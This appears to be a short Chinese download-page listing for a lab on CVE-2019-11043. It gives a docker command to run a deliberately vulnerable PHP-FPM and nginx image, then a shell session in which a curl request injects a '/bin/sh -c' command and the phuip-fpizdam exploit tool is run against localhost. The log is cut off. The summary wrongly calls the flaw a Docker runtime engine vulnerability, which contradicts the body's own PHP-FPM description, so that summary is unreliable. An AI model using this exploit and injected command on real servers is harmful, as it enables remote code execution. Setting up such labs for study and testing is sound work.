
Docker CVE-2019-11043
5星
- 浏览量: 0
- 大小:None
- 文件类型:None
简介:
CVE-2019-11043是针对Docker容器运行时引擎的安全漏洞,该漏洞可能允许攻击者在目标系统上执行任意代码,影响了Docker服务的广泛使用和安全性。
带有易受攻击的PHP-FPM版本(CVE-2019-11043)和nginx的docker映像可以通过以下命令运行:`docker run --rm -p8080:80 akamajoris/cve-2019-11043`。随后,您应该能够通过浏览器访问Web应用程序。
开发人员从相关仓库构建了二进制文件,并执行如下操作:
```
root@debian:~/gopath/bin# curl localhost:8080/?a=/bin/sh+-c+which+which
root@debian:~/gopath/bin# ./phuip-fpizdam http://localhost:8080/index.php
2019/10/24 08:53:00 Base status code is 200
2019/10/24 08:53:00 Status...
```
以上是关于如何使用该docker映像和执行特定命令的说明。
全部评论 (0)
还没有任何评论哟~


